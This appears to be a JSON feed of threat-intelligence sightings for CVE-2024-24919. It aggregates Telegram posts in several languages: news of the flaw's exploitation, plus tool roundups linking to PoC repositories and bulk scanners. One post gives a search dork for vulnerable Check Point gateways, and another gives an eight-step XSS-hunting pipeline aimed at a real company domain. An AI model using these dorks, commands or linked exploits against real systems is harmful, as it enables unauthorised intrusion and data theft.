"Telegram/U2sOfuJHZWQidc7lY-5GN9sJ8v4v49zN7rKeMKlLu5xmuJk", "content": "", "creation_timestamp": "2024-06-30T04:06:04.000000Z"}, {"uuid": "ff8b5a5e-ec1a-4124-a794-ebee97beb09b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "Telegram/rNuLSo5pdhN-f0gVUG9lvGNgqCzhZkhCwCskpxLKkO_mVL4", "content": "", "creation_timestamp": "2024-06-01T21:53:31.000000Z"}, {"uuid": "17a71385-0e93-4273-86f0-7d75f936a128", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6654", "content": "Tools - Hackers Factory\n\nGraphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint. \n\nhttps://github.com/dolevf/graphw00f\n\nSecurity Auditor Utility for GraphQL APIs \n\nhttps://github.com/dolevf/graphql-cop\n\nA toolkit for testing, tweaking and cracking JSON Web Tokens \n\nhttps://github.com/ticarpi/jwt_tool\n\nSearch Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. \n\nhttps://github.com/Zarcolio/sitedorks\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities. \n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nThis checklist may help you to have a good methodology for bug bounty hunting\n\nhttps://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md\n\nJS Fuzzing - LazyEgg\n\nhttps://github.com/schooldropout1337/lazyegg/?s=08\n\nCheck point: CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nBurp Extension to find potential endpoints, parameters, and generate a custom target wordlist \n\nhttps://github.com/xnl-h4ck3r/GAP-Burp-Extension\n\nLive Feed of C2 servers, tools, and botnets \n\nhttps://github.com/montysecurity/C2-Tracker\n\n#HackersFactory", "creation_timestamp": "2024-06-02T06:50:08.000000Z"}, {"uuid": "b8df28c0-45d2-462c-b14d-f91b9be2613a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6746", "content": "Tools - Hackers Factory\n\nVATINT (Vehicle and Transportation Intelligence) Tools \n\nOnline services for search by VIN or License Plates numbers in different countries;\nStolen car database (Europe);\nContainer and ships tracking;\nFlights, trains, drones tracking\n\nand much more.\n\nhttps://github.com/CScorza/Tool-VATINT\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nand more.\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nSUBPROBER\n\nA simple tool for scanning a list of websites. Allows you to collect a lot of data - IP address, status code,\u00a0 title, response length, content type, redirect info etc.\n\nhttps://github.com/RevoltSecurities/SubProber\n\nAdvanced Search Tools\n\n- regional search engines\n- privacy search engines\n- search engines dorking\n- fact checking tools\n- database search tools\n\nand more.\n\nhttps://start.me/p/nRADzL/advanced-search-tools\n\nGitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC\n\n10 years of the GitHub Security Bug Bounty Program\n\nhttps://github.blog/2024-06-11-10-years-of-the-github-security-bug-bounty-program/\n\nThis page lists all the available scanning profiles shipped with Rainmap Lite.\n\nhttps://github.com/cldrn/rainmap-lite/wiki/Scanning-profiles\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.\n\nhttps://github.com/danielmiessler/SecLists\n\nOnion addresses for anything. \n\nhttps://github.com/cmars/onionpipe\n\nOneDorkForAll/dorks/1M_dork at main \u00b7 HackShiv/OneDorkForAll \u00b7 GitHub\n\nhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork\n\nPoC for using MS Windows printers for persistence / command and control via Internet Printing\nLicense\n\nhttps://github.com/Diverto/IPPrintC2\n\n#HackersFactory", "creation_timestamp": "2024-06-17T09:53:50.000000Z"}, {"uuid": "3dd4da90-63fc-47ff-8036-4f7e51eeb62a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6671", "content": "Tools - Hackers Factory\n\nGourlex \n\nIt is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.\n\nTry the tool :\u00a0 https://github.com/trap-bytes/gourlex\n\nFind xss with this automation of the following work :\n\n1. subfinder -d indeed.com -o indeed.txt //Find Subdomains\n2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains\n3. echo \"indeed.com\" | gau --threads 5 &gt;&gt; Enpoints.txt // Find Endpoints\n4. cat httpx.txt | katana -jc &gt;&gt; Enpoints.txt // Find More Endpoints\n5. cat Enpoints.txt | uro &gt;&gt; Endpoints_F.txt // Remove Duplicates\n6. cat Endpoints_F.txt | gf xss &gt;&gt; XSS.txt // Filter Endpoints for XSS\n7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters\n8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS\n\nScript : https://github.com/dirtycoder0124/xss\n\nA simple powershell script that can run in powershell for linux. The purpose of the script is to identify potential privilege escalation vulnerabilities on Linux systems that run with PowerShell\n\nhttps://github.com/tjnull/pentest-arsenal/tree/main/Cadiclus\n\nInQL makes mapping out a GraphQL API easy! It also includes several automated vulnerability checks!\u00a0 \n\ngithub.com/doyensec/inql\n\nA Microservices-based framework for the study of Network Security and Penetration Test techniques \n\nhttps://github.com/DockerSecurityPlayground/DSP\n\nSnaffler reimplementation in Python -\n\nhttps://github.com/SnaffCon/Snaffler\nhttps://github.com/asmtlab/snafflepy\n\nCVE-2024-24919 \n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nExtract endpoints from APK files \n\nhttps://github.com/ndelphit/apkurlgrep\n\n#HackersFactory", "creation_timestamp": "2024-06-03T09:14:10.000000Z"}, {"uuid": "c665846a-eef4-4a8f-b84c-a7331e7e6117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6699", "content": "Tools - Hackers Factory\n\nThis tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. \n\nhttps://github.com/xaitax/TotalRecall\n\nAn Event Tracing for Windows (ETW) tool that allows you to enumerate Manifest &amp; MOF providers, as well as collect events from desired providers.\n\nhttps://github.com/jsecurity101/ETWInspector\n\nSearch and browse documents and data; find the people and companies you look for. \n\nhttps://github.com/alephdata/aleph\n\nDDoS -Web Scanning -Phone Hunter -CCTV Hunter -Deface -Mass Deface -Deface Maker -Bypass Maker -Auto Bypasser -Database Dump -Dorking -Admin Finder -Wifi Jammer -Executor -Simple Dirber -Trojan Maker -Mass Dork -Doxing / Osint \n\nhttps://github.com/MrSanZz/pandora\n\nSploitScan is a sophisticated cybersecurity utility designed to provide detailed information on vulnerabilities and associated exploits. \n\nhttps://github.com/xaitax/SploitScan\n\nProgress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800) \n\nhttps://github.com/sinsinology/CVE-2024-4358\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nNew release of OneDriveExplorer. Mainly fixes for null value errors\n\nhttps://github.com/Beercow/OneDriveExplorer/releases/tag/v2024.05.17\n\nDLLirant is a tool to automatize the DLL Hijacking researches on a specified binary. \n\nhttps://github.com/redteamsocietegenerale/DLLirant\n\nAD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses \n\nhttps://github.com/Mazars-Tech/AD_Miner\n\n#HackersFactory", "creation_timestamp": "2024-06-07T16:48:50.000000Z"}, {"uuid": "9df4f0d0-8de6-4379-adc2-57739a6b3320", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/MrVGunz/1159", "content": "CVE-2024-24919 \ud83d\udc40\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0647 \u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u067e\u0633 \u0627\u0632 \u0627\u062a\u0635\u0627\u0644 \u0628\u0647 \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0648 \u0641\u0639\u0627\u0644 \u0628\u0648\u062f\u0646 VPN \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u06cc\u0627 Mobile Access Software Blades\u060c \u0628\u0647 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062e\u0627\u0635\u06cc \u062f\u0631 Check Point Security Gateways \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u062f. \u06cc\u06a9 \u0627\u0635\u0644\u0627\u062d \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0627\u0633\u062a.\n\u062c\u0632\u0626\u06cc\u0627\u062a: https://support.checkpoint.com/results/sk/sk182336\n\nCVE-2024-24919 \ud83d\udc40\nPotentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.\n\nDetails:https://support.checkpoint.com/results/sk/sk182336", "creation_timestamp": "2024-06-04T08:52:04.000000Z"}, {"uuid": "17d1ca95-2156-4ac8-80b0-eaed5cd54e1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "Telegram/aEfKdcbyXHzh95Yl3DNmbc_qS4RFMWOwDyWeeZeUAfiO_0U", "content": "", "creation_timestamp": "2024-07-15T07:21:18.000000Z"}, {"uuid": "a1999c51-6075-4a76-a7a4-c013f094fce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/CyberSecurityIL/46168", "content": "\u05d7\u05d1\u05e8\u05ea Checkpoint \u05de\u05e9\u05d7\u05e8\u05e8\u05ea \u05e2\u05d3\u05db\u05d5\u05df \u05d7\u05d9\u05e8\u05d5\u05dd \u05dc\u05e1\u05d2\u05d9\u05e8\u05ea \u05d7\u05d5\u05dc\u05e9\u05ea Zero-Day \u05d4\u05de\u05e0\u05d5\u05e6\u05dc\u05ea \u05d1\u05e4\u05d5\u05e2\u05dc \u05e2\"\u05d9 \u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05d1\u05e2\u05d5\u05dc\u05dd.\n\n\u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2024-24919 \u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05dc\u05e7\u05e8\u05d5\u05d0 \u05de\u05d9\u05d3\u05e2 \u05e9\u05dc\u05d0 \u05d0\u05de\u05d5\u05e8 \u05dc\u05d4\u05d9\u05d7\u05e9\u05e3 \u05d5\u05de\u05e9\u05e4\u05d9\u05e2\u05d4 \u05e2\u05dc \u05d4\u05de\u05d5\u05e6\u05e8\u05d9\u05dd \u05d4\u05d1\u05d0\u05d9\u05dd (\u05d0\u05dd \u05d4\u05dd \u05d7\u05e9\u05d5\u05e4\u05d9\u05dd \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8 \u05d5\u05de\u05d0\u05e4\u05e9\u05e8\u05d9\u05dd \u05d2\u05d9\u05e9\u05ea VPN \u05d0\u05d5 \u05d2\u05d9\u05e9\u05ea \u05de\u05d5\u05d1\u05d9\u05d9\u05dc):\nCloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances.\n\u05d1\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea \u05d4\u05d1\u05d0\u05d5\u05ea:\n R80.20.x, R80.20SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.\n\u05d4\u05d7\u05d1\u05e8\u05d4 \u05e4\u05d9\u05e8\u05e1\u05de\u05d4 \u05ea\u05d9\u05e7\u05d5\u05df \u05dc\u05db\u05dc \u05d4\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea \u05d4\u05e4\u05d2\u05d9\u05e2\u05d5\u05ea, \u05e4\u05e8\u05d8\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd \u05db\u05d0\u05df \ud83d\udc49 \n\nhttps://t.me/CyberSecurityIL/5190\n\n#\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2024-05-29T16:46:33.000000Z"}, {"uuid": "3c0ada88-e678-4023-93ea-e7659b73c111", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/CyberSecurityIL/66553", "content": "\u2757\u05e7\u05d1\u05d5\u05e6\u05ea \u05d4\u05db\u05d5\u05e4\u05e8 NailaoLocker \u05ea\u05d5\u05e7\u05e4\u05ea \u05d0\u05e8\u05d2\u05d5\u05e0\u05d9 \u05d1\u05e8\u05d9\u05d0\u05d5\u05ea \u05d1\u05d0\u05d9\u05e8\u05d5\u05e4\u05d4.\n\n\u05d1\u05d9\u05df \u05d9\u05d5\u05e0\u05d9 \u05dc\u05d0\u05d5\u05e7\u05d8\u05d5\u05d1\u05e8 2024, \u05d6\u05d5\u05d4\u05ea\u05d4 \u05e0\u05d5\u05d6\u05e7\u05ea \u05db\u05d5\u05e4\u05e8 \u05d7\u05d3\u05e9\u05d4 \u05d1\u05e9\u05dd NailaoLocker \u05d1\u05de\u05ea\u05e7\u05e4\u05d5\u05ea \u05e2\u05dc \u05d0\u05e8\u05d2\u05d5\u05e0\u05d9 \u05d1\u05e8\u05d9\u05d0\u05d5\u05ea \u05d1\u05d0\u05d9\u05e8\u05d5\u05e4\u05d4. \n\n\u05de\u05d7\u05e7\u05e8 \u05e9\u05dc \u05d7\u05d1\u05e8\u05ea Orange Cyberdefense \u05de\u05e6\u05d9\u05d9\u05df \u05db\u05d9 \u05d4\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05e0\u05d9\u05e6\u05dc\u05d5 \u05d0\u05ea \u05d7\u05d5\u05dc\u05e9\u05ea CVE-2024-24919 \u05d1\u05de\u05e2\u05e8\u05db\u05d5\u05ea \u05e9\u05dc Check Point \u05db\u05d3\u05d9 \u05dc\u05d7\u05d3\u05d5\u05e8 \u05dc\u05d0\u05e8\u05d2\u05d5\u05e0\u05d9\u05dd, \u05dc\u05d2\u05e0\u05d5\u05d1 \u05de\u05d9\u05d3\u05e2 \u05d5\u05dc\u05d4\u05e6\u05e4\u05d9\u05df \u05e7\u05d1\u05e6\u05d9\u05dd. \u05e4\u05e2\u05d9\u05dc\u05d5\u05ea \u05d4\u05e7\u05d1\u05d5\u05e6\u05d4 \u05de\u05e6\u05d1\u05d9\u05e2\u05d4 \u05e2\u05dc \u05db\u05da \u05e9\u05d4\u05dd \u05db\u05db\u05dc \u05d4\u05e0\u05e8\u05d0\u05d4 \u05e7\u05e9\u05d5\u05e8\u05d9\u05dd \u05dc\u05e1\u05d9\u05df.\n\n\u05d4\u05de\u05d7\u05e7\u05e8 \u05d4\u05de\u05dc\u05d0 - \u05db\u05d0\u05df\n\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05e9\u05db\u05ea\u05d1\u05ea\u05d9 \u05e2\u05dc \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05d4\u05d6\u05d5 \u05db\u05d1\u05e8 \u05d1\u05de\u05d0\u05d9 \u05db\u05da \u05e9\u05de\u05d9 \u05e9\u05e2\u05d3\u05db\u05df \u05db\u05e9\u05e4\u05d9\u05e8\u05e1\u05de\u05ea\u05d9 \u05dc\u05d0 \u05e0\u05e4\u05d2\u05e2 \u05e2\u05dc \u05d9\u05d3\u05d9 \u05d4\u05e7\u05d1\u05d5\u05e6\u05d4 \u05d4\u05d6\u05d5 \u05e9\u05d4\u05d7\u05dc\u05d4 \u05d0\u05ea \u05d4\u05e7\u05de\u05e4\u05d9\u05d9\u05df \u05d4\u05d4\u05ea\u05e7\u05e4\u05d9 \u05e9\u05dc\u05d4 \u05e8\u05e7 \u05d1\u05d9\u05d5\u05e0\u05d9.\n\nhttps://t.me/CyberSecurityIL/6631\n\n#\u05db\u05d5\u05e4\u05e8 #\u05d7\u05d5\u05dc\u05e9\u05d5\u05ea", "creation_timestamp": "2025-02-20T10:17:15.000000Z"}, {"uuid": "78d95081-0cd5-4166-bf37-b6a9c39bfb0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/true_secator/5800", "content": "\u0412\u043e\u043f\u0440\u0435\u043a\u0438 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044f\u043c Check Point \u0432\u044b\u0441\u043e\u043a\u043e\u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f 0-day VPN \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0435\u0449\u0435 \u0441 \u0430\u043f\u0440\u0435\u043b\u044f 2024 \u0433\u043e\u0434\u0430, \u0432 \u0445\u043e\u0434\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043a\u0440\u0430\u0434\u0443\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 Active Directory \u0434\u043b\u044f \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u043f\u043e \u0441\u0435\u0442\u044f\u043c \u0436\u0435\u0440\u0442\u0432.\n\n\u0412 \u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a Check Point \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u043d\u0438\u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 24 \u043c\u0430\u044f \u043d\u0430 \u0438\u0445 \u0448\u043b\u044e\u0437\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u0440\u044b\u0445 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 VPN \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u043f\u0430\u0440\u043e\u043b\u044e.\n\n\u0412\u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 (CVE-2024-24919) \u0432 \u044d\u0442\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0441\u0440\u043e\u0447\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0442\u0435\u0439 CloudGuard, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways \u0438 Quantum Spark.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Mnemonic \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441\u0432\u043e\u0438\u043c\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f\u043c\u0438, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-24919 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0440\u0435\u0434\u0430\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0435\u0449\u0435 30 \u0430\u043f\u0440\u0435\u043b\u044f.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u00ab\u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0439\u00bb, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0435\u0435 \u043b\u0435\u0433\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0430 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0438\u043b\u0438 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0448\u043b\u044e\u0437\u0430\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Check Point \u0441 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c VPN \u0438 \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u0435\u0440\u0435\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0442\u044c \u0438 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0442\u044c \u0445\u044d\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0443\u044e \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a Active Directory. \u0421\u043b\u0430\u0431\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b.\n\n\u041f\u043e\u043b\u043d\u044b\u0439 \u043c\u0430\u0441\u0448\u0442\u0430\u0431 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0439 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0435\u0449\u0435 \u043f\u043e\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d.\n\n\u0411\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043e, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u043b\u0438 ntds.dit, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u0434\u0430\u043d\u043d\u044b\u0435 Active Directory \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445, \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0445\u044d\u0448\u0430\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u0439, \u043e\u0442 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 2\u20133 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e 